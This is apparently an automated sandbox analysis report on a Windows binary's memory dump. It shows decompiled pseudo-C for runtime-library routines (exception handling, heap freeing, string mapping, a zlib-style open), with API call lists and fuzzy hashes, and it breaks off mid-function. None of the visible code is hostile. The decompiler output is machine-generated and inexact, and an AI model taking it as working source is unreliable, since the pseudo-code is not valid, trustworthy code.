				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138BC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                            0x0040cdc9
                                                                                                            0x0040cdc9
                                                                                                            0x0040cdc9
                                                                                                            0x0040cdc9
                                                                                                            0x0040cdc9
                                                                                                            0x0040cdc9
                                                                                                            0x0040cdc9
                                                                                                            0x0040cdcf
                                                                                                            0x0040cdd1
                                                                                                            0x0040cdd1
                                                                                                            0x00413604
                                                                                                            0x00413609
                                                                                                            0x0041360f
                                                                                                            0x00413615
                                                                                                            0x0041361b
                                                                                                            0x00413621
                                                                                                            0x00413627
                                                                                                            0x0041362e
                                                                                                            0x00413635
                                                                                                            0x0041363c
                                                                                                            0x00413643
                                                                                                            0x0041364a
                                                                                                            0x00413651
                                                                                                            0x00413652
                                                                                                            0x0041365b
                                                                                                            0x00413663
                                                                                                            0x0041366b
                                                                                                            0x00413676
                                                                                                            0x00413680
                                                                                                            0x00413685
                                                                                                            0x0041368a
                                                                                                            0x00413694
                                                                                                            0x0041369e
                                                                                                            0x004136a3
                                                                                                            0x004136a9
                                                                                                            0x004136ae
                                                                                                            0x004136ba
                                                                                                            0x004136bf
                                                                                                            0x004136c1
                                                                                                            0x004136c9
                                                                                                            0x004136d4
                                                                                                            0x004136e1
                                                                                                            0x004136e3
                                                                                                            0x004136e5
                                                                                                            0x004136ea
                                                                                                            0x004136fe

                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004136B4
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004136C9
                                                                                                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 004136D4
                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 004136F0
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004136F7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2579439406-0
                                                                                                            • Opcode ID: f3eb938b166f39d4d020ee18d2dca188d57905d26237a3e6fbc30aeabaf4294c
                                                                                                            • Instruction ID: 3f88b7fe57f3af7d6669973961cc77578a05b077b22a335d8346f22795b37958
                                                                                                            • Opcode Fuzzy Hash: f3eb938b166f39d4d020ee18d2dca188d57905d26237a3e6fbc30aeabaf4294c
                                                                                                            • Instruction Fuzzy Hash: A321F574601204EFD720DF65E9496457FB4FB08316F80407AE50887362E778A682CF4D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040AD70, Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040AD70(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}





                                                                                                            0x0040ad73
                                                                                                            0x0040ad75
                                                                                                            0x0040ad78
                                                                                                            0x0040ad80
                                                                                                            0x0040ad88
                                                                                                            0x0040ad88
                                                                                                            0x0040ad8e
                                                                                                            0x0040ad90
                                                                                                            0x0040ad98
                                                                                                            0x00000000
                                                                                                            0x0040ada1
                                                                                                            0x0040ad98
                                                                                                            0x0040ada8

                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32 ref: 0040AD90
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Heap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859560861-0
                                                                                                            • Opcode ID: 1cc3613efa1b408a07d3bda581eddd458e6bd1778ad13645e2e7b7f8138afa03
                                                                                                            • Instruction ID: 87dac2184505844c09cb42e2b5ef4fe4ca92d2df11bc344c415d2bc0d320b6aa
                                                                                                            • Opcode Fuzzy Hash: 1cc3613efa1b408a07d3bda581eddd458e6bd1778ad13645e2e7b7f8138afa03
                                                                                                            • Instruction Fuzzy Hash: 7FE09A312003009FC3209B21DC08F9337AAEF88311F15C42AE95AD36A0CB78EC82CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004123B1, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004123B1() {

				SetUnhandledExceptionFilter(E0041236F);
				return 0;
			}



                                                                                                            0x004123b6
                                                                                                            0x004123be

                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001236F), ref: 004123B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: c5bec46203bb928b6661f320d0224aa42f58454027b2ed7ef2d3bc0e147829a7
                                                                                                            • Instruction ID: a9d574e59b617bab4533f0d30aa636e653cc17d396c8e80ebbe0ff8c2e40eb30
                                                                                                            • Opcode Fuzzy Hash: c5bec46203bb928b6661f320d0224aa42f58454027b2ed7ef2d3bc0e147829a7
                                                                                                            • Instruction Fuzzy Hash: 6590027065114C8B464057705D0D68729D8BA4C6067D148616436C4058EB9842509559
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00417041, Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00417041(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0xec8f03f6
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E004179E0(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B675(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B675(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A29(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040B9F0(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A29(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E0041476E(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B80D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CF70(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CDC9(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E0041476E(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E0041476E(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B80D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CF70(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B80D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CF70(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                            0x00417049
                                                                                                            0x00417050
                                                                                                            0x00417058
                                                                                                            0x0041705a
                                                                                                            0x00417060
                                                                                                            0x00417066
                                                                                                            0x0041707b
                                                                                                            0x00417085
                                                                                                            0x0041708b
                                                                                                            0x0041708e
                                                                                                            0x00417090
                                                                                                            0x00417090
                                                                                                            0x0041707d
                                                                                                            0x0041707d
                                                                                                            0x0041707d
                                                                                                            0x0041707b
                                                                                                            0x0041709d
                                                                                                            0x004170c1
                                                                                                            0x004170c1
                                                                                                            0x004170c9
                                                                                                            0x0041727b
                                                                                                            0x0041727e
                                                                                                            0x00417281
                                                                                                            0x00417284
                                                                                                            0x0041728b
                                                                                                            0x0041728b
                                                                                                            0x0041728e
                                                                                                            0x00417291
                                                                                                            0x00417298
                                                                                                            0x00417298
                                                                                                            0x0041729e
                                                                                                            0x004172a4
                                                                                                            0x004172a7
                                                                                                            0x004172aa
                                                                                                            0x004172b3
                                                                                                            0x004172b6
                                                                                                            0x004173af
                                                                                                            0x004173b1
                                                                                                            0x004173b1
                                                                                                            0x004173b4
                                                                                                            0x004173b6
                                                                                                            0x004173b9
                                                                                                            0x004173be
                                                                                                            0x004173bf
                                                                                                            0x004173c2
                                                                                                            0x004173c4
                                                                                                            0x004173c6
                                                                                                            0x004173c9
                                                                                                            0x004173cb
                                                                                                            0x004173cc
                                                                                                            0x004173d1
                                                                                                            0x004173c9
                                                                                                            0x004173d2
                                                                                                            0x00000000
                                                                                                            0x004173d2
                                                                                                            0x004172c9
                                                                                                            0x004172ce
                                                                                                            0x004172d1
                                                                                                            0x004172d4
                                                                                                            0x004172d6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004172ea
                                                                                                            0x004172ec
                                                                                                            0x004172ef
                                                                                                            0x004172f1
                                                                                                            0x004172fa
                                                                                                            0x00417339
                                                                                                            0x00417339
                                                                                                            0x00417339
                                                                                                            0x0041733b
                                                                                                            0x0041733b
                                                                                                            0x0041733d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00417344
                                                                                                            0x0041735c
                                                                                                            0x0041735e
                                                                                                            0x00417361
                                                                                                            0x00417363
                                                                                                            0x0041737f
                                                                                                            0x00417381
                                                                                                            0x00417389
                                                                                                            0x0041738b
                                                                                                            0x0041738b
                                                                                                            0x00417365
                                                                                                            0x00417365
                                                                                                            0x00417365
                                                                                                            0x0041738f
                                                                                                            0x00000000
                                                                                                            0x00417394
                                                                                                            0x004172fc
                                                                                                            0x004172ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00417301
                                                                                                            0x00417304
                                                                                                            0x00417309
                                                                                                            0x00417322
                                                                                                            0x00417328
                                                                                                            0x0041732a
                                                                                                            0x0041732c
                                                                                                            0x00417332
                                                                                                            0x00417332
                                                                                                            0x00417332
                                                                                                            0x00417335
                                                                                                            0x00000000
                                                                                                            0x00417335
                                                                                                            0x0041730b
                                                                                                            0x00417310
                                                                                                            0x00417312
                                                                                                            0x00417314
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00417316
                                                                                                            0x0041731c
                                                                                                            0x00000000
                                                                                                            0x0041731c
                                                                                                            0x004172f3
                                                                                                            0x004172f3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004170d7
                                                                                                            0x004170da
                                                                                                            0x004172ac
                                                                                                            0x004172ac
                                                                                                            0x004173d4
                                                                                                            0x004173e5
                                                                                                            0x004173e5
                                                                                                            0x004170e0
                                                                                                            0x004170e6
                                                                                                            0x004170ed
                                                                                                            0x004170ed
                                                                                                            0x004170f0
                                                                                                            0x00417113
                                                                                                            0x00417115
                                                                                                            0x00417117
                                                                                                            0x00000000
                                                                                                            0x0041711d
                                                                                                            0x0041711d
                                                                                                            0x00417162
                                                                                                            0x00417162
                                                                                                            0x00417165
                                                                                                            0x00417168
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00417181
                                                                                                            0x0041726a
                                                                                                            0x0041726d
                                                                                                            0x00417272
                                                                                                            0x00000000
                                                                                                            0x00417275
                                                                                                            0x00417187
                                                                                                            0x0041719b
                                                                                                            0x0041719d
                                                                                                            0x004171a2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004171af
                                                                                                            0x004171da
                                                                                                            0x004171dc
                                                                                                            0x00417223
                                                                                                            0x00417223
                                                                                                            0x00417223
                                                                                                            0x00417225
                                                                                                            0x00417225
                                                                                                            0x00417227
                                                                                                            0x00417237
                                                                                                            0x0041723d
                                                                                                            0x0041723f
                                                                                                            0x00417241
                                                                                                            0x00417242
                                                                                                            0x00417243
                                                                                                            0x00417246
                                                                                                            0x0041724c
                                                                                                            0x0041724f
                                                                                                            0x00417248
                                                                                                            0x00417248
                                                                                                            0x00417249
                                                                                                            0x00417249
                                                                                                            0x00417260
                                                                                                            0x00417260
                                                                                                            0x00417264
                                                                                                            0x00417269
                                                                                                            0x00000000
                                                                                                            0x00417227
                                                                                                            0x004171e2
                                                                                                            0x004171e3
                                                                                                            0x004171e5
                                                                                                            0x004171e8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004171ea
                                                                                                            0x004171ea
                                                                                                            0x004171ee
                                                                                                            0x004171f3
                                                                                                            0x0041720c
                                                                                                            0x00417212
                                                                                                            0x00417214
                                                                                                            0x00417216
                                                                                                            0x0041721c
                                                                                                            0x0041721c
                                                                                                            0x0041721c
                                                                                                            0x0041721f
                                                                                                            0x00000000
                                                                                                            0x0041721f
                                                                                                            0x004171f5
                                                                                                            0x004171fa
                                                                                                            0x004171fc
                                                                                                            0x004171fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00417200
                                                                                                            0x00417206
                                                                                                            0x00000000
                                                                                                            0x00417206
                                                                                                            0x004171b4
                                                                                                            0x004171d3
                                                                                                            0x004171d3
                                                                                                            0x00000000
                                                                                                            0x004171b4
                                                                                                            0x00417123
                                                                                                            0x00417124
                                                                                                            0x00417129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0041712b
                                                                                                            0x0041712b
                                                                                                            0x00417134
                                                                                                            0x0041714a
                                                                                                            0x00417150
                                                                                                            0x00417152
                                                                                                            0x0041715d
                                                                                                            0x0041715d
                                                                                                            0x00000000
                                                                                                            0x0041715d
                                                                                                            0x00417154
                                                                                                            0x0041715a
                                                                                                            0x0041715a
                                                                                                            0x00000000
                                                                                                            0x0041715a
                                                                                                            0x00417136
                                                                                                            0x0041713b
                                                                                                            0x0041713f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00417141
                                                                                                            0x00000000
                                                                                                            0x00417141
                                                                                                            0x00417117
                                                                                                            0x004170c9
                                                                                                            0x0041709f
                                                                                                            0x004170a2
                                                                                                            0x004170a5
                                                                                                            0x004170a5
                                                                                                            0x004170a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004170aa
                                                                                                            0x004170ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004170af
                                                                                                            0x00000000
                                                                                                            0x004170af
                                                                                                            0x004170b7
                                                                                                            0x004170bb
                                                                                                            0x004170bd
                                                                                                            0x004170bd
                                                                                                            0x004170be
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417073
                                                                                                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02151868), ref: 00417085
                                                                                                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417111
                                                                                                            • _malloc.LIBCMT ref: 0041714A
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 0041717D
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 00417199
                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 004171D3
                                                                                                            • _malloc.LIBCMT ref: 0041720C
                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417237
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041725A
                                                                                                            • __freea.LIBCMT ref: 00417264
                                                                                                            • __freea.LIBCMT ref: 0041726D
                                                                                                            • ___ansicp.LIBCMT ref: 0041729E
                                                                                                            • ___convertcp.LIBCMT ref: 004172C9
                                                                                                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 004172EA
                                                                                                            • _malloc.LIBCMT ref: 00417322
                                                                                                            • _memset.LIBCMT ref: 00417344
                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041735C
                                                                                                            • ___convertcp.LIBCMT ref: 0041737A
                                                                                                            • __freea.LIBCMT ref: 0041738F
                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3809854901-0
                                                                                                            • Opcode ID: 2602308185bd18c2bfb158d4db0534af95f164cdd5be1c16695ea743ff94772d
                                                                                                            • Instruction ID: abda70701d45e68d96e2917a94aa4f5dbb1b5ba954cdfcd5a2fe0a3214fe1872
                                                                                                            • Opcode Fuzzy Hash: 2602308185bd18c2bfb158d4db0534af95f164cdd5be1c16695ea743ff94772d
                                                                                                            • Instruction Fuzzy Hash: DCB1A072908119EFDF119FA5CC808EF3BB5EB48354B14856BFD15A2260D3398DD2DBA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405760, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E00405760(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B80D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403030(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B80D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405110(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B80D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E00407150(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404C90();
